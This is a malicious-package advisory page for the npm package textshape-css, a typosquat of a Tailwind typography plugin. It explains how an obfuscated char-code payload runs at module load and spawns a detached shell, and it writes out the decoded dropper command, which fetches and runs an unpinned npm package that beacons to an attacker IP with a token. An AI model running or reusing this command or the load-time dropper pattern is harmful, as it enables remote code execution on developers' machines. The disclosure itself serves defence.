Logo
npm

textshape-css @1.0.0

Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:45 PM UTC

Malicious

OSV ID

MAL-2026-6475

Ecosystem

npm

Summary

The package presents itself as a Tailwind CSS typography plugin (its name, description, and source tree clone @tailwindcss/typography), but src/index.js appends an obfuscated payload that runs at module load. Char-code arrays at the bottom of src/index.js decode to child_process , spawn / exec , /bin/sh , and the command npx -y runtimedev-link@latest --token "http://194.11.226.41:4000|zRlY7_JxvFY8_Zhhu8ih24iW_dT5Rb_9" . A trailing _.y(); invokes this immediately whenever any consumer does require('textshape-css') / import 'textshape-css' . On POSIX it spawns /bin/sh -c 'nohup... >/dev/null 2>&1' detached with stdio ignored; on Windows it goes via child_process.exec with windowsHide . The effect is to fetch and run an unpinned third-party npm package ( runtimedev-link@latest ) that beacons to a bare IP (194.11.226.41:4000) over plain HTTP with an attacker-supplied token — a remote-code-execution dropper. The package name and description are a near-verbatim typosquat of @tailwindcss/typography, targeting developers searching for that plugin.

Source: amazon-inspector (4e596e1ea1365aadfa6c75047b664bb41b29b60828595b9271d4c2c217476b60)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.

SEE HACKTRON REVIEW → SCAN DEPENDENCIES